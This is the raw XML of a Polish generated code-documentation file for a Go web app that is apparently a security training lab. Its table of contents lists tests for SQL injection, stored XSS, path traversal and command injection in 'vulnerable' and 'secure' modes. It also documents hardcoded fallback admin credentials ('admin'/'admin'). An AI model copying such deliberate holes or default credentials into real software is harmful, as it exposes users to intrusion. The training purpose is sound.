          </w:rPr>
          <w:t xml:space="preserve">10.9. Funkcje i metody </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec181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82">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.10. buildRouter </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec182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83">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.11. registerHealthRoutes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sec183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84">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.12. registerAPIRoutes </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec184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85">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.13. registerUIRoutes </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec185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86">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.14. registerLabRoutes </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec186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87">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.15. main </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec187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88">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.16. setupIntegrationTestApp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sec188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89">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.17. setupIntegrationTestAppWithSecurity </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec189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90">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.18. doRequest </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec190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91">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.19. doFormRequest </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec191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92">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.20. doFormRequestWithCookie </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec192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93">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.21. doRequestWithCookie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sec193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94">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.22. responseCookieValue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sec194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95">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.23. extractCreatedID </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec195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96">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.24. TestIntegration_Ping </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec196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97">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.25. TestIntegration_Posts </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec197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98">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.26. TestIntegration_Login </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec198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199">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.27. TestIntegration_DatabaseFileIsCreated </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec199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00">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.28. TestIntegration_UI_PostsPage </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec200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01">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.29. TestIntegration_UI_LoginPage </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec201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02">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.30. TestIntegration_UI_LoginSubmit </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec202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03">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.31. TestIntegration_UI_PostsPartial </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec203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04">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.32. TestIntegration_UI_LoginPartial </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec204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05">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.33. TestIntegration_UIModeToggle </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec205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06">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.34. TestIntegration_SeedDB_RewritesDemoCredentialsForSecurityMode </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec206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07">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.35. TestIntegration_SecureAuthCookieIsSignedAndSameSiteStrict </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec207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08">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.36. TestIntegration_CSRFSecureFormRejectsAndAcceptsTokens </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec208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09">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.37. TestIntegration_ProfileEndpointHonorsSecurityModeForCSRF </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec209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10">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.38. TestIntegration_Register </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec210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11">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.39. TestIntegration_DeleteAuthorization_SecurityEnabled </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec211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12">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.40. decodeSearchResults </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec212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13">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.41. TestIntegration_SearchSQLi_VulnerableMode </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec213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14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.42. TestIntegration_SearchSQLi_SecureMode </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec214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15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.43. TestIntegration_CreateDeleteRequireLogin_DefaultMode </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec215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16">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.44. postCommentForm </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec216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17">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.45. TestIntegration_StoredXSS_VulnerableMode </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec217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18">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.46. TestIntegration_StoredXSS_SecureMode </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec218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19">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.47. TestIntegration_PathTraversal_LFI </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec219 \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="312"/>
      </w:pPr>
      <w:hyperlink w:anchor="sec220">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10.48. TestIntegration_CommandInjection </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec220 \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="11" w:name="sec11"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Spis pakietów</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>internal/config (#internal-config)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>internal/db (#internal-db)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>internal/handlers (#internal-handlers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>internal/security (#internal-security)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>internal/service (#internal-service)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>internal/views (#internal-views)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>root (#root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="12" w:name="sec12"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. internal/config</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/config/config.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="13" w:name="sec13"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Typy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="14" w:name="sec14"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. AppConfig</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r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internal/config/config.go:5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typ AppConfig przechowuje dane używane przez pakiet internal/config _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DBPath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Port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SecurityEnabled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pole danych struktury.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="15" w:name="sec15"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Funkcje i metody</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="16" w:name="sec16"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.4. Load</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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internal/config/config.go:11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Load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AppConfig</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2015" w:name="lst15"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 15. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201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AppConfig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7" w:name="sec17"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. internal/db</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/db/db.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="18" w:name="sec18"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.1. Stałe i zmienne</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="19" w:name="sec19"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.2. fallbackAdminEmail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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internal/db/db.go:17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"admin@example.com"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internal/db _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="20" w:name="sec20"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.3. fallbackAdminPassword</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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internal/db/db.go:16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"admin"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internal/db _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="21" w:name="sec21"/>
      <w:pPr>
